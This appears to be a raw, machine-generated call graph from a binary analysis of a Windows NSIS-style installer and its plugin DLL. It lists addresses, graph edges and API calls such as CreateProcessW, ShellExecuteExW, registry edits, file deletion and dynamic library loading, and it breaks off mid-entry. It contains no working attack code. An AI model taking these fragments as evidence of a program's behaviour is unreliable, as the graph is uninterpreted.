4190->4194 4193 401ff4 4195 402004 4193->4195 4196 401ff9 4193->4196 4195->4190 4217 40649b wsprintfW 4196->4217 4199 4055f4 4198->4199 4200 401fd9 4198->4200 4201 405610 lstrlenW 4199->4201 4202 406591 22 API calls 4199->4202 4209 405b37 CreateProcessW 4200->4209 4203 405639 4201->4203 4204 40561e lstrlenW 4201->4204 4202->4201 4206 40564c 4203->4206 4207 40563f SetWindowTextW 4203->4207 4204->4200 4205 405630 lstrcatW 4204->4205 4205->4203 4206->4200 4208 405652 SendMessageW SendMessageW SendMessageW 4206->4208 4207->4206 4208->4200 4210 401fdf 4209->4210 4211 405b6a CloseHandle 4209->4211 4210->4190 4210->4194 4212 4069f3 WaitForSingleObject 4210->4212 4211->4210 4213 406a0d 4212->4213 4214 406a1f GetExitCodeProcess 4213->4214 4218 406984 4213->4218 4214->4193 4217->4190 4219 4069a1 PeekMessageW 4218->4219 4220 4069b1 WaitForSingleObject 4219->4220 4221 406997 DispatchMessageW 4219->4221 4220->4213 4221->4219 5332 40554d 5333 405571 5332->5333 5334 40555d 5332->5334 5335 405579 IsWindowVisible 5333->5335 5338 405590 5333->5338 5336 405563 5334->5336 5344 4055ba 5334->5344 5337 405586 5335->5337 5335->5344 5340 40451f SendMessageW 5336->5340 5341 404e8e 5 API calls 5337->5341 5339 4055bf CallWindowProcW 5338->5339 5343 404f0e 4 API calls 5338->5343 5342 40556d 5339->5342 5340->5342 5341->5338 5343->5344 5344->5339 4222 4021cf 4223 402dcb 22 API calls 4222->4223 4224 4021d6 4223->4224 4225 402dcb 22 API calls 4224->4225 4226 4021e0 4225->4226 4227 402dcb 22 API calls 4226->4227 4228 4021ea 4227->4228 4229 402dcb 22 API calls 4228->4229 4230 4021f4 4229->4230 4231 402dcb 22 API calls 4230->4231 4232 4021fe 4231->4232 4233 40223d CoCreateInstance 4232->4233 4234 402dcb 22 API calls 4232->4234 4237 40225c 4233->4237 4234->4233 4236 40231b 4237->4236 4238 401423 4237->4238 4239 4055d9 29 API calls 4238->4239 4240 401431 4239->4240 4240->4236 4241 40254f 4242 402e0b 22 API calls 4241->4242 4243 402559 4242->4243 4244 402dcb 22 API calls 4243->4244 4245 402562 4244->4245 4246 40256d RegQueryValueExW 4245->4246 4251 402953 4245->4251 4247 402593 RegCloseKey 4246->4247 4248 40258d 4246->4248 4247->4251 4248->4247 4252 40649b wsprintfW 4248->4252 4252->4247 5345 40204f 5346 402dcb 22 API calls 5345->5346 5347 402056 5346->5347 5348 406948 5 API calls 5347->5348 5349 402065 5348->5349 5350 402081 GlobalAlloc 5349->5350 5351 4020f1 5349->5351 5350->5351 5352 402095 5350->5352 5353 406948 5 API calls 5352->5353 5354 40209c 5353->5354 5355 406948 5 API calls 5354->5355 5356 4020a6 5355->5356 5356->5351 5360 40649b wsprintfW 5356->5360 5358 4020df 5361 40649b wsprintfW 5358->5361 5360->5358 5361->5351 5362 729f170d 5368 729f15b6 5362->5368 5364 729f176b GlobalFree 5365 729f1740 5365->5364 5366 729f1725 5366->5364 5366->5365 5367 729f1757 VirtualFree 5366->5367 5367->5364 5370 729f15bc 5368->5370 5369 729f15c2 5369->5366 5370->5369 5371 729f15ce GlobalFree 5370->5371 5371->5366 4281 403fd4 4282 403fec 4281->4282 4283 40414d 4281->4283 4282->4283 4284 403ff8 4282->4284 4285 40419e 4283->4285 4286 40415e GetDlgItem GetDlgItem 4283->4286 4287 404003 SetWindowPos 4284->4287 4288 404016 4284->4288 4290 4041f8 4285->4290 4300 401389 2 API calls 4285->4300 4289 4044d3 23 API calls 4286->4289 4287->4288 4292 404061 4288->4292 4293 40401f ShowWindow 4288->4293 4294 404188 SetClassLongW 4289->4294 4307 404148 4290->4307 4354 40451f 4290->4354 4297 404080 4292->4297 4298 404069 DestroyWindow 4292->4298 4295 40413a 4293->4295 4296 40403f GetWindowLongW 4293->4296 4299 40140b 2 API calls 4294->4299 4376 40453a 4295->4376 4296->4295 4303 404058 ShowWindow 4296->4303 4304 404085 SetWindowLongW 4297->4304 4305 404096 4297->4305 4353 40445c 4298->4353 4299->4285 4301 4041d0 4300->4301 4301->4290 4306 4041d4 SendMessageW 4301->4306 4303->4292 4304->4307 4305->4295 4310 4040a2 GetDlgItem 4305->4310 4306->4307 4308 40140b 2 API calls 4312 40420a 4308->4312 4309 40445e DestroyWindow EndDialog 4309->4353 4313 4040d0 4310->4313 4314 4040b3 SendMessageW IsWindowEnabled 4310->4314 4311 40448d ShowWindow 4311->4307 4312->4307 4312->4308 4312->4309 4316 406591 22 API calls 4312->4316 4326 4044d3 23 API calls 4312->4326 4344 40439e DestroyWindow 4312->4344 4357 4044d3 4312->4357 4315 4040d5 4313->4315 4317 4040dd 4313->4317 4318 404124 SendMessageW 4313->4318 4319 4040f0 4313->4319 4314->4307 4314->4313 4373 4044ac 4315->4373 4316->4312 4317->4315 4317->4318 4318->4295 4321 4040f8 4319->4321 4322 40410d 4319->4322 4370 40140b 4321->4370 4325 40140b 2 API calls 4322->4325 4323 40410b 4323->4295 4327 404114 4325->4327 4326->4312 4327->4295 4327->4315 4329 404285 GetDlgItem 4330 4042a2 ShowWindow KiUserCallbackDispatcher 4329->4330 4331 40429a 4329->4331 4360 4044f5 KiUserCallbackDispatcher 4330->4360 4331->4330 4333 4042cc EnableWindow 4338 4042e0 4333->4338 4334 4042e5 GetSystemMenu EnableMenuItem SendMessageW 4335 404315 SendMessageW 4334->4335 4334->4338 4335->4338 4338->4334 4361 404508 SendMessageW 4338->4361 4362 403fb5 4338->4362 4365 406554 lstrcpynW 4338->4365 4340 404344 lstrlenW 4341 406591 22 API calls 4340->4341 4342 40435a SetWindowTextW 4341->4342 4366 401389 4342->4366 4345 4043b8 CreateDialogParamW 4344->4345 4344->4353 4346 4043eb 4345->4346 4345->4353 4347 4044d3 23 API calls 4346->4347 4348 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4347->4348 4349 401389 2 API calls 4348->4349 4350 40443c 4349->4350 4350->4307 4351 404444 ShowWindow 4350->4351 4352 40451f SendMessageW 4351->4352 4352->4353 4353->4307 4353->4311 4355 404537 4354->4355 4356 404528 SendMessageW 4354->4356 4355->4312 4356->4355 4358 406591 22 API calls 4357->4358 4359 4044de SetDlgItemTextW 4358->4359 4359->4329 4360->4333 4361->4338 4363 406591 22 API calls 4362->4363 4364 403fc3 SetWindowTextW 4363->4364 4364->4338 4365->4340 4368 401390 4366->4368 4367 4013fe 4367->4312 4368->4367 4369 4013cb MulDiv SendMessageW 4368->4369 4369->4368 4371 401389 2 API calls 4370->4371 4372 401420 4371->4372 4372->4315 4374 4044b3 4373->4374 4375 4044b9 SendMessageW 4373->4375 4374->4375 4375->4323 4377 4045fd 4376->4377 4378 404552 GetWindowLongW 4376->4378 4377->4307 4378->4377 4379 404567 4378->4379 4379->4377 4380 404594 GetSysColor 4379->4380 4381 404597 4379->4381 4380->4381 4382 4045a7 SetBkMode 4381->4382 4383 40459d SetTextColor 4381->4383 4384 4045c5 4382->4384 4385 4045bf GetSysColor 4382->4385 4383->4382 4386 4045d6 4384->4386 4387 4045cc SetBkColor 4384->4387 4385->4384 4386->4377 4388 4045f0 CreateBrushIndirect 4386->4388 4389 4045e9 DeleteObject 4386->4389 4387->4386 4388->4377 4389->4388 5372 401a55 5373 402dcb 22 API calls 5372->5373 5374 401a5e ExpandEnvironmentStringsW 5373->5374 5375 401a72 5374->5375 5377 401a85 5374->5377 5376 401a77 lstrcmpW 5375->5376 5375->5377 5376->5377 4465 4023d7 4466 4023e5 4465->4466 4467 4023df 4465->4467 4468 4023f3 4466->4468 4470 402dcb 22 API calls 4466->4470 4469 402dcb 22 API calls 4467->4469 4471 402401 4468->4471 4472 402dcb 22 API calls 4468->4472 4469->4466 4470->4468 4473 402dcb 22 API calls 4471->4473 4472->4471 4474 40240a WritePrivateProfileStringW 4473->4474 4475 4014d7 4476 402da9 22 API calls 4475->4476 4477 4014dd Sleep 4476->4477 4479 402c4f 4477->4479 5383 402459 5384 402461 5383->5384 5385 40248c 5383->5385 5386 402e0b 22 API calls 5384->5386 5387 402dcb 22 API calls 5385->5387 5388 402468 5386->5388 5389 402493 5387->5389 5391 402dcb 22 API calls 5388->5391 5393 4024a0 5388->5393 5394 402e89 5389->5394 5392 402479 RegDeleteValueW RegCloseKey 5391->5392 5392->5393 5395 402e96 5394->5395 5396 402e9d 5394->5396 5395->5393 5396->5395 5398 402ece 5396->5398 5399 4063c1 RegOpenKeyExW 5398->5399 5400 402efc 5399->5400 5401 402f0c RegEnumValueW 5400->5401 5406 402f2f 5400->5406 5409 402fa6 5400->5409 5402 402f96 RegCloseKey 5401->5402 5401->5406 5402->5409 5403 402f6b RegEnumKeyW 5404 402f74 RegCloseKey 5403->5404 5403->5406 5405 406948 5 API calls 5404->5405 5408 402f84 5405->5408 5406->5402 5406->5403 5406->5404 5407 402ece 6 API calls 5406->5407 5407->5406 5408->5409 5410 402f88 RegDeleteKeyW 5408->5410 5409->5395 5410->5409 4548 40175a 4549 402dcb 22 API calls 4548->4549 4550 401761 SearchPathW 4549->4550 4551 40177c 4550->4551 5411 401d5d 5412 402da9 22 API calls 5411->5412 5413 401d64 5412->5413 5414 402da9 22 API calls 5413->5414 5415 401d70 GetDlgItem 5414->5415 5416 40265d 5415->5416 5417 729f1000 5420 729f101b 5417->5420 5421 729f15b6 GlobalFree 5420->5421 5422 729f1020 5421->5422 5423 729f1027 GlobalAlloc 5422->5423 5424 729f1024 5422->5424 5423->5424 5425 729f15dd 3 API calls 5424->5425 5426 729f1019 5425->5426 5427 729f103d 5428 729f101b 5 API calls 5427->5428 5429 729f1056 5428->5429 5430 402663 5431 402692 5430->5431 5432 402677 5430->5432 5434 4026c2 5431->5434 5435 402697 5431->5435 5433 402da9 22 API calls 5432->5433 5444 40267e 5433->5444 5437 402dcb 22 API calls 5434->5437 5436 402dcb 22 API calls 5435->5436 5438 40269e 5436->5438 5439 4026c9 lstrlenW 5437->5439 5447 406576 WideCharToMultiByte 5438->5447 5439->5444 5441 4026b2 lstrlenA 5441->5444 5442 40270c 5443 4026f6 5443->5442 5445 4060f6 WriteFile 5443->5445 5444->5442 5444->5443 5446 406125 5 API calls 5444->5446 5445->5442 5446->5443 5447->5441 5448 403be4 5449 403bef 5448->5449 5450 403bf3 5449->5450 5451 403bf6 GlobalAlloc 5449->5451 5451->5450 4555 4015e6 4556 402dcb 22 API calls 4555->4556 4557 4015ed 4556->4557 4574 405ece CharNextW CharNextW 4557->4574 4559 401656 4561 401688 4559->4561 4562 40165b 4559->4562 4560 405e50 CharNextW 4570 4015f6 4560->4570 4564 401423 29 API calls 4561->4564 4563 401423 29 API calls 4562->4563 4565 401662 4563->4565 4572 401680 4564->4572 4586 406554 lstrcpynW 4565->4586 4569 40166f SetCurrentDirectoryW 4569->4572 4570->4559 4570->4560 4571 40163c GetFileAttributesW 4570->4571 4580 405b1f 4570->4580 4583 405aa8 CreateDirectoryW 4570->4583 4587 405b02 CreateDirectoryW 4570->4587 4571->4570 4575 405eeb 4574->4575 4578 405efd 4574->4578 4577 405ef8 CharNextW 4575->4577 4575->4578 4576 405f21 4576->4570 4577->4576 4578->4576 4579 405e50 CharNextW 4578->4579 4579->4578 4581 406948 5 API calls 4580->4581 4582 405b26 4581->4582 4582->4570 4584 405af4 4583->4584 4585 405af8 GetLastError 4583->4585 4584->4570 4585->4584 4586->4569 4588 405b12 4587->4588 4589 405b16 GetLastError 4587->4589 4588->4570 4589->4588 4590 401966 4591 401968 4590->4591 4592 402dcb 22 API calls 4591->4592 4593 40196d 4592->4593 4596 405c60 4593->4596 4635 405f2b 4596->4635 4599 405c88 DeleteFileW 4601 401976 4599->4601 4600 405c9f 4602 405dca 4600->4602 4649 406554 lstrcpynW 4600->4649 4602->4601 4609 4068b1 2 API calls 4602->4609 4604 405cc5 4605 405cd8 4604->4605 4606 405ccb lstrcatW 4604->4606 4650 405e6f lstrlenW 4605->4650 4607 405cde 4606->4607 4610 405cee lstrcatW 4607->4610 4612 405cf9 lstrlenW FindFirstFileW 4607->4612 4611 405de4 4609->4611 4610->4612 4611->4601 4613 405de8 4611->4613 4614 405dbf 4612->4614 4624 405d1b 4612->4624 4615 405e23 3 API calls 4613->4615 4614->4602 4616 405dee 4615->4616 4618 405c18 5 API calls 4616->4618 4617 405da2 FindNextFileW 4621 405db8 FindClose 4617->4621 4617->4624 4620 405dfa 4618->4620 4622 405e14 4620->4622 4623 405dfe 4620->4623 4621->4614 4626 4055d9 29 API calls 4622->4626 4623->4601 4628 4055d9 29 API calls 4623->4628 4624->4617 4627 405c60 65 API calls 4624->4627 4631 4055d9 29 API calls 4624->4631 4633 4055d9 29 API calls 4624->4633 4654 406554 lstrcpynW 4624->4654 4655 405c18 4624->4655 4663 406314 MoveFileExW 4624->4663 4626->4601 4627->4624 4629 405e0b 4628->4629 4630 406314 41 API calls 4629->4630 4632 405e12 4630->4632 4631->4617 4632->4601 4633->4624 4667 406554 lstrcpynW 4635->4667 4637 405f3c 4638 405ece 4 API calls 4637->4638 4639 405f42 4638->4639 4640 405c80 4639->4640 4641 406802 5 API calls 4639->4641 4640->4599 4640->4600 4647 405f52 4641->4647 4642 405f83 lstrlenW 4643 405f8e 4642->4643 4642->4647 4644 405e23 3 API calls 4643->4644 4646 405f93 GetFileAttributesW 4644->4646 4645 4068b1 2 API calls 4645->4647 4646->4640 4647->4640 4647->4642 4647->4645 4648 405e6f 2 API calls 4647->4648 4648->4642 4649->4604 4651 405e7d 4650->4651 4652 405e83 CharPrevW 4651->4652 4653 405e8f 4651->4653 4652->4651 4652->4653 4653->4607 4654->4624 4656 40601f 2 API calls 4655->4656 4657 405c24 4656->4657 4658 405c45 4657->4658 4659 405c33 RemoveDirectoryW 4657->4659 4660 405c3b DeleteFileW 4657->4660 4658->4624 4661 405c41 4659->4661 4660->4661 4661->4658 4662 405c51 SetFileAttributesW 4661->4662 4662->4658 4664 406335 4663->4664 4665 406328 4663->4665 4664->4624 4668 40619a 4665->4668 4667->4637 4669 4061f0 GetShortPathNameW 4668->4669 4670 4061ca 4668->4670 4671 406205 4669->4671 4672 40630f 4669->4672 4695 406044 GetFileAttributesW CreateFileW 4670->4695 4671->4672 4674 40620d wsprintfA 4671->4674 4672->4664 4676 406591 22 API calls 4674->4676 4675 4061d4 CloseHandle GetShortPathNameW 4675->4672 4677 4061e8 4675->4677 4678 406235 4676->4678 4677->4669 4677->4672 4696 406044 GetFileAttributesW CreateFileW 4678->4696 4680 406242 4680->4672 4681 406251 GetFileSize GlobalAlloc 4680->4681 4682 406273 4681->4682 4683 406308 CloseHandle 4681->4683 4684 4060c7 ReadFile 4682->4684 4683->4672 4685 40627b 4684->4685 4685->4683 4697 405fa9 lstrlenA 4685->4697 4688 406292 lstrcpyA 4691 4062b4 4688->4691 4689 4062a6 4690 405fa9 4 API calls 4689->4690 4690->4691 4692 4062eb SetFilePointer 4691->4692 4693 4060f6 WriteFile 4692->4693 4694 406301 GlobalFree 4693->4694 4694->4683 4695->4675 4696->4680 4698 405fea lstrlenA 4697->4698 4699 405fc3 lstrcmpiA 4698->4699 4701 405ff2 4698->4701 4700 405fe1 CharNextA 4699->4700 4699->4701 4700->4698 4701->4688 4701->4689 5452 401c68 5453 402da9 22 API calls 5452->5453 5454 401c6f 5453->5454 5455 402da9 22 API calls 5454->5455 5456 401c7c 5455->5456 5457 401c91 5456->5457 5459 402dcb 22 API calls 5456->5459 5458 401ca1 5457->5458 5460 402dcb 22 API calls 5457->5460 5461 401cf8 5458->5461 5462 401cac 5458->5462 5459->5457 5460->5458 5464 402dcb 22 API calls 5461->5464 5463 402da9 22 API calls 5462->5463 5465 401cb1 5463->5465 5466 401cfd 5464->5466 5468 402da9 22 API calls 5465->5468 5467 402dcb 22 API calls 5466->5467 5469 401d06 FindWindowExW 5467->5469 5470 401cbd 5468->5470 5473 401d28 5469->5473 5471 401ce8 SendMessageW 5470->5471 5472 401cca SendMessageTimeoutW 5470->5472 5471->5473 5472->5473 5474 4028e9 5475 4028ef 5474->5475 5476 4028f7 FindClose 5475->5476 5477 402c4f 5475->5477 5476->5477 5478 4016f1 5479 402dcb 22 API calls 5478->5479 5480 4016f7 GetFullPathNameW 5479->5480 5481 401711 5480->5481 5482 401733 5480->5482 5481->5482 5485 4068b1 2 API calls 5481->5485 5483 401748 GetShortPathNameW 5482->5483 5484 402c4f 5482->5484 5483->5484 5486 401723 5485->5486 5486->5482 5488 406554 lstrcpynW 5486->5488 5488->5482 5489 401e73 GetDC 5490 402da9 22 API calls 5489->5490 5491 401e85 GetDeviceCaps MulDiv ReleaseDC 5490->5491 5492 402da9 22 API calls 5491->5492 5493 401eb6 5492->5493 5494 406591 22 API calls 5493->5494 5495 401ef3 CreateFontIndirectW 5494->5495 5496 40265d 5495->5496 5497 4014f5 SetForegroundWindow 5498 402c4f 5497->5498 5499 402975 5500 402dcb 22 API calls 5499->5500 5501 402981 5500->5501 5502 402997 5501->5502 5503 402dcb 22 API calls 5501->5503 5504 40601f 2 API calls 5502->5504 5503->5502 5505 40299d 5504->5505 5527 406044 GetFileAttributesW CreateFileW 5505->5527 5507 4029aa 5508 402a60 5507->5508 5509 4029c5 GlobalAlloc 5507->5509 5510 402a48 5507->5510 5511 402a67 DeleteFileW 5508->5511 5512 402a7a 5508->5512 5509->5510 5513 4029de 5509->5513 5514 4032d9 36 API calls 5510->5514 5511->5512 5528 4034e7 SetFilePointer 5513->5528 5516 402a55 CloseHandle 5514->5516 5516->5508 5517 4029e4 5518 4034d1 ReadFile 5517->5518 5519 4029ed GlobalAlloc 5518->5519 5520 402a31 5519->5520 5521 4029fd 5519->5521 5522 4060f6 WriteFile 5520->5522 5523 4032d9 36 API calls 5521->5523 5524 402a3d GlobalFree 5522->5524 5526 402a0a 5523->5526 5524->5510 5525 402a28 GlobalFree 5525->5520 5526->5525 5527->5507 5528->5517 4973 405b7a ShellExecuteExW 5529 40197b 5530 402dcb 22 API calls 5529->5530 5531 401982 lstrlenW 5530->5531 5532 40265d 5531->5532 4974 4020fd 4975 4021c1 4974->4975 4976 40210f 4974->4976 4978 401423 29 API calls 4975->4978 4977 402dcb 22 API calls 4976->4977 4979 402116 4977->4979 4985 40231b 4978->4985 4980 402dcb 22 API calls 4979->4980 4981 40211f 4980->4981 4982 402135 LoadLibraryExW 4981->4982 4983 402127 GetModuleHandleW 4981->4983 4982->4975 4984 402146 4982->4984 4983->4982 4983->4984 4997 4069b7 4984->4997 4988 402190 4992 4055d9 29 API calls 4988->4992 4989 402157 4990 402176 4989->4990 4991 40215f 4989->4991 5002 729f1817 4990->5002 4994 401423 29 API calls 4991->4994 4993 402167 4992->4993 4993->4985 4995 4021b3 FreeLibrary 4993->4995 4994->4993 4995->4985 5044 406576 WideCharToMultiByte 4997->5044 4999 4069d4 5000 4069db GetProcAddress 4999->5000 5001 402151 4999->5001 5000->5001 5001->4988 5001->4989 5003 729f184a 5002->5003 5045 729f1bff 5003->5045 5005 729f1851 5006 729f1976 5005->5006 5007 729f1869 5005->5007 5008 729f1862 5005->5008 5006->4993 5079 729f2480 5007->5079 5095 729f243e 5008->5095 5013 729f18af 5108 729f2655 5013->5108 5014 729f18cd 5016 729f191e 5014->5016 5017 729f18d3 5014->5017 5015 729f1898 5029 729f188e 5015->5029 5105 729f2e23 5015->5105 5023 729f2655 10 API calls 5016->5023 5127 729f1666 5017->5127 5019 729f1885 5019->5029 5089 729f2b98 5019->5089 5020 729f187f 5020->5019 5025 729f1890 5020->5025 5030 729f190f 5023->5030 5024 729f18b5 5119 729f1654 5024->5119 5099 729f2810 5025->5099 5029->5013 5029->5014 5035 729f1965 5030->5035 5133 729f2618 5030->5133 5032 729f1896 5032->5029 5033 729f2655 10 API calls 5033->5030 5035->5006 5037 729f196f GlobalFree 5035->5037 5037->5006 5041 729f1951 5041->5035 5137 729f15dd wsprintfW 5041->5137 5043 729f194a FreeLibrary 5043->5041 5044->4999 5140 729f12bb GlobalAlloc 5045->5140 5047 729f1c26 5141 729f12bb GlobalAlloc 5047->5141 5049 729f1e6b GlobalFree GlobalFree GlobalFree 5050 729f1e88 5049->5050 5064 729f1ed2 5049->5064 5052 729f227e 5050->5052 5060 729f1e9d 5050->5060 5050->5064 5051 729f1c31 5051->5049 5053 729f1d26 GlobalAlloc 5051->5053 5055 729f1d71 lstrcpyW 5051->5055 5056 729f1d8f GlobalFree 5051->5056 5059 729f1d7b lstrcpyW 5051->5059 5063 729f2126 5051->5063 5051->5064 5069 729f2067 GlobalFree 5051->5069 5070 729f21ae 5051->5070 5073 729f12cc 2 API calls 5051->5073 5074 729f1dcd 5051->5074 5054 729f22a0 GetModuleHandleW 5052->5054 5052->5064 5053->5051 5057 729f22c6 5054->5057 5058 729f22b1 LoadLibraryW 5054->5058 5055->5059 5056->5051 5148 729f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5057->5148 5058->5057 5058->5064 5059->5051 5060->5064 5144 729f12cc 5060->5144 5062 729f2318 5062->5064 5066 729f2325 lstrlenW 5062->5066 5147 729f12bb GlobalAlloc 5063->5147 5064->5005 5149 729f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5066->5149 5069->5051 5070->5064 5076 729f2216 lstrcpyW 5070->5076 5071 729f22d8 5071->5062 5077 729f2302 GetProcAddress 5071->5077 5072 729f233f 5072->5064 5073->5051 5074->5051 5142 729f162f GlobalSize GlobalAlloc 5074->5142 5076->5064 5077->5062 5078 729f212f 5078->5005 5081 729f2498 5079->5081 5080 729f12cc GlobalAlloc lstrcpynW 5080->5081 5081->5080 5083 729f25c1 GlobalFree 5081->5083 5085 729f256b GlobalAlloc CLSIDFromString 5081->5085 5086 729f2540 GlobalAlloc WideCharToMultiByte 5081->5086 5088 729f258a 5081->5088 5151 729f135a 5081->5151 5083->5081 5084 729f186f 5083->5084 5084->5015 5084->5020 5084->5029 5085->5083 5086->5083 5088->5083 5155 729f27a4 5088->5155 5091 729f2baa 5089->5091 5090 729f2c4f CreateFileA 5094 729f2c6d 5090->5094 5091->5090 5093 729f2d39 5093->5029 5158 729f2b42 5094->5158 5096 729f2453 5095->5096 5097 729f245e GlobalAlloc 5096->5097 5098 729f1868 5096->5098 5097->5096 5098->5007 5103 729f2840 5099->5103 5100 729f28ee 5102 729f28f4 GlobalSize 5100->5102 5104 729f28fe 5100->5104 5101 729f28db GlobalAlloc 5101->5104 5102->5104 5103->5100 5103->5101 5104->5032 5106 729f2e2e 5105->5106 5107 729f2e6e GlobalFree 5106->5107 5162 729f12bb GlobalAlloc 5108->5162 5110 729f270b lstrcpynW 5113 729f265f 5110->5113 5111 729f26fa StringFromGUID2 5111->5113 5112 729f26d8 MultiByteToWideChar 5112->5113 5113->5110 5113->5111 5113->5112 5114 729f271e wsprintfW 5113->5114 5115 729f2742 GlobalFree 5113->5115 5116 729f2777 GlobalFree 5113->5116 5117 729f1312 2 API calls 5113->5117 5163 729f1381 5113->5163 5114->5113 5115->5113 5116->5024 5117->5113 5167 729f12bb GlobalAlloc 5119->5167 5121 729f1659 5122 729f1666 2 API calls 5121->5122 5123 729f1663 5122->5123 5124 729f1312 5123->5124 5125 729f131b GlobalAlloc lstrcpynW 5124->5125 5126 729f1355 GlobalFree 5124->5126 5125->5126 5126->5030 5128 729f169f lstrcpyW 5127->5128 5131 729f1672 wsprintfW 5127->5131 5132 729f16b8 5128->5132 5131->5132 5132->5033 5134 729f2626 5133->5134 5135 729f1931 5133->5135 5134->5135 5136 729f2642 GlobalFree 5134->5136 5135->5041 5135->5043 5136->5134 5138 729f1312 2 API calls 5137->5138 5139 729f15fe 5138->5139 5139->5035 5140->5047 5141->5051 5143 729f164d 5142->5143 5143->5074 5150 729f12bb GlobalAlloc 5144->5150 5146 729f12db lstrcpynW 5146->5064 5147->5078 5148->5071 5149->5072 5150->5146 5152 729f1361 5151->5152 5153 729f12cc 2 API calls 5152->5153 5154 729f137f 5153->5154 5154->5081 5156 729f2808 5155->5156 5157 729f27b2 VirtualAlloc 5155->5157 5156->5088 5157->5156 5159 729f2b4d 5158->5159 5160 729f2b5d 5159->5160 5161 729f2b52 GetLastError 5159->5161 5160->5093 5161->5160 5162->5113 5164 729f13ac 5163->5164 5165 729f138a 5163->5165 5164->5113 5165->5164 5166 729f1390 lstrcpyW 5165->5166 5166->5164 5167->5121 5533 40497d 5534 4049b3 5533->5534 5535 40498d 5533->5535 5537 40453a 8 API calls 5534->5537 5536 4044d3 23 API calls 5535->5536 5538 40499a SetDlgItemTextW 5536->5538 5539 4049bf 5537->5539 5538->5534 5540 402b7e 5541 402bd0 5540->5541 5542 402b85 5540->5542 5543 406948 5 API calls 5541->5543 5545 402da9 22 API calls 5542->5545 5548 402bce 5542->5548 5544 402bd7 5543->5544 5546 402dcb 22 API calls 5544->5546 5547 402b93 5545->5547 5549 402be0 5546->5549 5550 402da9 22 API calls 5547->5550 5549->5548 5551 402be4 IIDFromString 5549->5551 5552 402b9f 5550->5552 5551->5548 5553 402bf3 5551->5553 5557 40649b wsprintfW 5552->5557 5553->5548 5558 406554 lstrcpynW 5553->5558 5555 402c10 CoTaskMemFree 5555->5548 5557->5548 5558->5555 5559 401000 5560 401037 BeginPaint GetClientRect 5559->5560 5562 40100c DefWindowProcW 5559->5562 5563 4010f3 5560->5563 5564 401179 5562->5564 5565 401073 CreateBrushIndirect FillRect DeleteObject 5563->5565 5566 4010fc 5563->5566 5565->5563 5567 401102 CreateFontIndirectW 5566->5567 5568 401167 EndPaint 5566->5568 5567->5568 5569 401112 6 API calls 5567->5569 5568->5564 5569->5568 5570 402a80 5571 402da9 22 API calls 5570->5571 5572 402a86 5571->5572 5573 402ac9 5572->5573 5574 402aad 5572->5574 5575 402953 5572->5575 5576 402ae3 5573->5576 5577 402ad3 5573->5577 5578 402ab2 5574->5578 5579 402ac3 5574->5579 5581 406591 22 API calls 5576->5581 5580 402da9 22 API calls 5577->5580 5584 406554 lstrcpynW 5578->5584 5585 40649b wsprintfW 5579->5585 5580->5575 5581->5575 5584->5575 5585->5575 4136 401781 4142 402dcb 4136->4142 4140 40178f 4141 406073 2 API calls 4140->4141 4141->4140 4143 402dd7 4142->4143 4144 406591 22 API calls 4143->4144 4145 402df8 4144->4145 4146 401788 4145->4146 4147 406802 5 API calls 4145->4147 4148 406073 4146->4148 4147->4146 4149 406080 GetTickCount GetTempFileNameW 4148->4149 4150 4060ba 4149->4150 4151 4060b6 4149->4151 4150->4140 4151->4149 4151->4150 5586 401d82 5587 402da9 22 API calls 5586->5587 5588 401d93 SetWindowLongW 5587->5588 5589 402c4f 5588->5589 4171 401f03 4172 402da9 22 API calls 4171->4172 4173 401f09 4172->4173 4174 402da9 22 API calls 4173->4174 4175 401f15 4174->4175 4176 401f21 ShowWindow 4175->4176 4177 401f2c EnableWindow 4175->4177 4178 402c4f 4176->4178 4177->4178 5590 401503 5591 401508 5590->5591 5592 40152e 5590->5592 5593 402da9 22 API calls 5591->5593 5593->5592 5594 402903 5595 40290b 5594->5595 5596 40290f FindNextFileW 5595->5596 5599 402921 5595->5599 5597 402968 5596->5597 5596->5599 5600 406554 lstrcpynW 5597->5600 5600->5599 5601 729f1058 5603 729f1074 5601->5603 5602 729f10dd 5603->5602 5604 729f1092 5603->5604 5605 729f15b6 GlobalFree 5603->5605 5606 729f15b6 GlobalFree 5604->5606 5605->5604 5607 729f10a2 5606->5607 5608 729f10a9 GlobalSize 5607->5608 5609 729f10b2 5607->5609 5608->5609 5610 729f10c7 5609->5610 5611 729f10b6 GlobalAlloc 5609->5611 5613 729f10d2 GlobalFree 5610->5613 5612 729f15dd 3 API calls 5611->5612 5612->5610 5613->5602 5614 401588 5615 402bc9 5614->5615 5618 40649b wsprintfW 5615->5618 5617 402bce 5618->5617 5619 404609 lstrcpynW lstrlenW 5620 40198d 5621 402da9 22 API calls 5620->5621 5622 401994 5621->5622 5623 402da9 22 API calls 5622->5623 5624 4019a1 5623->5624 5625 402dcb 22 API calls 5624->5625 5626 4019b8 lstrlenW 5625->5626 5627 4019c9 5626->5627 5631 401a0a 5627->5631 5632 406554 lstrcpynW 5627->5632 5629 4019fa 5630 4019ff lstrlenW 5629->5630 5629->5631 5630->5631 5632->5629 5633 40168f 5634 402dcb 22 API calls 5633->5634 5635 401695 5634->5635 5636 4068b1 2 API calls 5635->5636 5637 40169b 5636->5637 5638 402b10 5639 402da9 22 API calls 5638->5639 5640 402b16 5639->5640 5641 402953 5640->5641 5642 406591 22 API calls 5640->5642 5642->5641 4253 402711 4254 402da9 22 API calls 4253->4254 4263 402720 4254->4263 4255 40285d 4256 40276a ReadFile 4256->4255 4256->4263 4258 402803 4258->4255 4258->4263 4267 406125 SetFilePointer 4258->4267 4259 4027aa MultiByteToWideChar 4259->4263 4260 40285f 4278 40649b wsprintfW 4260->4278 4263->4255 4263->4256 4263->4258 4263->4259 4263->4260 4264 4027d0 SetFilePointer MultiByteToWideChar 4263->4264 4265 402870 4263->4265 4276 4060c7 ReadFile 4263->4276 4264->4263 4265->4255 4266 402891 SetFilePointer 4265->4266 4266->4255 4268 406141 4267->4268 4271 406159 4267->4271 4269 4060c7 ReadFile 4268->4269 4270 40614d 4269->4270 4270->4271 4272 406162 SetFilePointer 4270->4272 4273 40618a SetFilePointer 4270->4273 4271->4258 4272->4273 4274 40616d 4272->4274 4273->4271 4279 4060f6 WriteFile 4274->4279 4277 4060e5 4276->4277 4277->4263 4278->4255 4280 406114 4279->4280 4280->4271 5643 401491 5644 4055d9 29 API calls 5643->5644 5645 401498 5644->5645 5646 404692 5647 4046aa 5646->5647 5653 4047c4 5646->5653 5654 4044d3 23 API calls 5647->5654 5648 